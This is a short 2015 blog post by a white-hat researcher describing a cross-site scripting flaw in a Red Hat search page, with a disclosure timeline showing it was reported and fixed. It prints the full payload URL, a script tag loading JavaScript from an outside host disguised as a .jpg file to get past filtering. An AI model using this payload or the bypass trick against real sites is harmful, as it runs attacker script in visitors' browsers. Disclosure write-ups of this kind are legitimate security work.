White Hat Hacking – RedHat Cross Site Scripting ( XSS )

by | Apr 18, 2015 | Security | 0 comments

White Hat Hacking – Redhat cross site scripting ( XSS )

Using an ordinary Cross site scripting payload, The vulnerability could NOT be exploited.

However, I tried to put the payload inside a JavaScript file with JPG extension and the trick worked !

Payload :

http://chinahall.redhat.com/search.jspx?q=
<SCRIPT SRC=//titrias.com/xss.jpg ></SCRIPT>

 

 

Timeline :

– 5 / 4 / 2015 : Reporting the vulnerability.

– 7 / 4 / 2015 : Vulnerability Resolved.

– 17 / 4 / 2015 : Acknowledgement published.

RedHat Acknowledgement

Are you under attack? We can help

Comments

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *